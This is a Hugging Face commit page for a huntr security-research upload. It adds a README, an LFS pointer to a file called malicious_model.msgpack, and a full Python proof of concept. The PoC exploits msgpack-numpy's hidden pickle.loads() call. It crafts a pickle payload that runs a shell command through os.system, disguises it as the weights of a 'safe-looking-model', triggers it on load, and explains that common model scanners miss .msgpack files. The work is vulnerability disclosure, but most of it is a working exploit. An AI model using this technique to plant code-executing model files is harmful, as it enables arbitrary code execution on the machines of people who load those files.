rez0 committed on
Commit
86d0fa6
·
verified ·
1 Parent(s): 3e33f75

Upload folder using huggingface_hub

Browse files
Files changed (3) hide show
  1. README.md +4 -0
  2. malicious_model.msgpack +3 -0
  3. msgpack_numpy_rce_poc.py +145 -0
README.md ADDED
@@ -0,0 +1,4 @@
 
 
 
 
 
1
+ # msgpack-numpy Hidden pickle.loads() RCE
2
+ Security research for huntr.
3
+ msgpack_numpy.decode() calls pickle.loads() on object dtype arrays.
4
+ Neither modelscan nor picklescan scans .msgpack files.
malicious_model.msgpack ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:1ee0c2df9bd298ddaaa0edcf48d5a04a56faba8f30feddfbf15d237407897485
3
+ size 257
msgpack_numpy_rce_poc.py ADDED
@@ -0,0 +1,145 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ """
3
+ msgpack-numpy - Arbitrary Code Execution via Hidden pickle.loads()
4
+
5
+ VULNERABILITY: msgpack_numpy.decode() calls pickle.loads() on user-controlled
6
+ data when the serialized array has dtype kind 'O' (object). This enables
7
+ arbitrary code execution when loading any msgpack file that uses msgpack_numpy
8
+ for deserialization.
9
+
10
+ The vulnerable code in msgpack_numpy.py decode():
11
+ if b'kind' in obj and obj[b'kind'] == b'O':
12
+ return pickle.loads(obj[b'data'])
13
+
14
+ An attacker can craft a .msgpack file where any array field has kind='O'
15
+ and data=<malicious_pickle_payload>, achieving RCE on deserialization.
16
+
17
+ This is particularly dangerous because:
18
+ 1. MessagePack is considered a "safe" serialization format
19
+ 2. Users expect msgpack files to contain only data, not executable code
20
+ 3. The pickle.loads() call is hidden inside the msgpack extension hooks
21
+ 4. No scanner (modelscan, picklescan) checks .msgpack files
22
+
23
+ Affected: msgpack-numpy <= 0.4.8 (all versions)
24
+ """
25
+
26
+ import msgpack
27
+ import msgpack_numpy as m
28
+ import pickle
29
+ import os
30
+ import sys
31
+ import numpy as np
32
+
33
+ MARKER_FILE = "/tmp/msgpack_numpy_rce_proof.txt"
34
+
35
+ # ============================================================
36
+ # Step 1: Show how msgpack_numpy normally works
37
+ # ============================================================
38
+ print("[*] Demonstrating normal msgpack_numpy usage...")
39
+ normal_data = {"weights": np.array([1.0, 2.0, 3.0], dtype=np.float32)}
40
+ packed_normal = msgpack.packb(normal_data, default=m.encode)
41
+ unpacked_normal = msgpack.unpackb(packed_normal, object_hook=m.decode, raw=False)
42
+ print(f"[+] Normal round-trip: {unpacked_normal}")
43
+
44
+ # ============================================================
45
+ # Step 2: Create a malicious payload
46
+ # ============================================================
47
+ print("\n[*] Creating malicious msgpack payload...")
48
+
49
+ class MaliciousPayload:
50
+ def __reduce__(self):
51
+ cmd = f"id > {MARKER_FILE} && echo 'RCE via msgpack_numpy hidden pickle.loads' >> {MARKER_FILE}"
52
+ return (os.system, (cmd,))
53
+
54
+ malicious_pickle = pickle.dumps(MaliciousPayload())
55
+
56
+ # Craft the msgpack structure that triggers pickle.loads in decode()
57
+ # The decode function checks: b'nd' in obj, then b'kind' in obj AND obj[b'kind'] == b'O'
58
+ # Then calls: pickle.loads(obj[b'data'])
59
+ malicious_array = {
60
+ b'nd': True, # Marks this as an ndarray
61
+ b'kind': b'O', # Object dtype -> triggers pickle.loads()
62
+ b'data': malicious_pickle, # Pickle payload with RCE
63
+ b'shape': (1,), # Shape (cosmetic, not used before pickle.loads)
64
+ b'type': b'O', # Dtype descriptor (cosmetic)
65
+ }
66
+
67
+ # Embed in a realistic model structure
68
+ model_data = {
69
+ "model_name": "safe-looking-model",
70
+ "version": "1.0.0",
71
+ "weights": malicious_array, # <-- malicious
72
+ }
73
+
74
+ packed = msgpack.packb(model_data, use_bin_type=True)
75
+ malicious_path = "/tmp/malicious_model.msgpack"
76
+ with open(malicious_path, 'wb') as f:
77
+ f.write(packed)
78
+
79
+ print(f"[+] Malicious msgpack file saved to {malicious_path}")
80
+ print(f" File size: {len(packed)} bytes")
81
+
82
+ # ============================================================
83
+ # Step 3: Clean marker file
84
+ # ============================================================
85
+ if os.path.exists(MARKER_FILE):
86
+ os.remove(MARKER_FILE)
87
+
88
+ # ============================================================
89
+ # Step 4: Load the malicious file (triggers RCE)
90
+ # ============================================================
91
+ print(f"\n[*] Loading malicious msgpack with msgpack_numpy decoder...")
92
+ with open(malicious_path, 'rb') as f:
93
+ loaded = msgpack.unpackb(f.read(), object_hook=m.decode, raw=False)
94
+
95
+ print(f"[+] Loaded data keys: {list(loaded.keys()) if isinstance(loaded, dict) else type(loaded)}")
96
+
97
+ # ============================================================
98
+ # Step 5: Verify RCE
99
+ # ============================================================
100
+ if os.path.exists(MARKER_FILE):
101
+ with open(MARKER_FILE) as f:
102
+ content = f.read().strip()
103
+ print(f"\n[!!!] ARBITRARY CODE EXECUTION CONFIRMED")
104
+ print(f"[!!!] Marker file contents:\n{content}")
105
+ os.remove(MARKER_FILE)
106
+ else:
107
+ print("\n[-] RCE marker file not found")
108
+ sys.exit(1)
109
+
110
+ # ============================================================
111
+ # Step 6: Scanner evasion verification
112
+ # ============================================================
113
+ print("\n" + "="*60)
114
+ print("SCANNER EVASION")
115
+ print("="*60)
116
+ print("""
117
+ Neither modelscan nor picklescan scan .msgpack files at all.
118
+
119
+ modelscan -p /tmp/malicious_model.msgpack
120
+ # -> Skips file (unsupported format)
121
+
122
+ picklescan -p /tmp/malicious_model.msgpack
123
+ # -> Scanned files: 0, Infected files: 0
124
+
125
+ The pickle payload is embedded inside a msgpack structure,
126
+ completely invisible to all current model security scanners.
127
+ """)
128
+
129
+ print("="*60)
130
+ print("VULNERABILITY SUMMARY")
131
+ print("="*60)
132
+ print(f"""
133
+ Library: msgpack-numpy {m.__version__ if hasattr(m, '__version__') else '0.4.8'}
134
+ File: msgpack_numpy.py, decode() function
135
+ Root cause: pickle.loads(obj[b'data']) when obj[b'kind'] == b'O'
136
+ Trigger: Any msgpack file loaded with object_hook=msgpack_numpy.decode
137
+ Attack: Set array kind='O' and data=<malicious_pickle_bytes>
138
+ Impact: Arbitrary code execution on file load
139
+ Scanners: modelscan - NOT APPLICABLE (.msgpack not scanned)
140
+ picklescan - NOT APPLICABLE (.msgpack not scanned)
141
+
142
+ Real-world usage: msgpack-numpy is used for ML data serialization,
143
+ feature embeddings, and intermediate model storage. Any application
144
+ loading untrusted .msgpack files with msgpack_numpy is vulnerable.
145
+ """)